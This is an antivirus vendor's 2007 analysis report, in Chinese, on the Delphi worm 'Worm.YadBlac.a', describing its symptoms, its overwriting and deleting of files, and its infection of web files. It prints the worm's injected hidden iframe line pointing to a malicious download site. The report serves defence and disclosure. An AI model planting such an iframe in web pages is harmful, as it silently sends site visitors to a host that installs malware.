瑞星最新病毒分析报告:"Worm.YadBlac.a"
来源:瑞星公司 时间:2007-04-13 13:04:28
这是一个采用Dehlip编写的蠕虫病毒。
一、中毒后的现像:
1、所有的图标会变成一个黑炸弹的图标:
2、激活该蠕虫时会有以下的对话框出现:
二、破坏行为:
1、感染网页相关文件。
该蠕虫会感染D盘到Z盘上的.asp|.htm|.html|.aspx|.PHP|.JSP文件。在原文件最后插入一个Iframe标签,使用户不知不觉中访问恶意站点。Iframe标签的内容如下:
<iframe src='http://www.dadayouxi.net/Black-Day.htm' width=0 height=0></iframe>
其中,http://www.dadayouxi.net网站含有恶意代码,打开该网站时,该蠕虫已经被下载到本地计算机并尝试运行。
2、破坏文件。
该蠕虫会把D盘到Z盘上所有的小于自身文件长度的文件删除,然后把自己伪装成目标文件。对于大于自身文件长度的文件,该蠕虫将用自己的文件内容覆盖目标文件,目标文件长度不发生改变。被破坏的文件的文件名不会发生改变。
相关文章
- 瑞星最新病毒分析报告:"Worm.dlOnlineGames.a"
- 瑞星最新病毒分析报告:"Worm.IRC.Myphoto.a"
- 瑞星最新病毒分析报告:"Win32.Miser.a(吝啬鬼)"
- 瑞星最新病毒分析报告:“Worm.Chouying(仇英)”
- 瑞星最新病毒分析报告:“Nimaya(熊猫烧香)”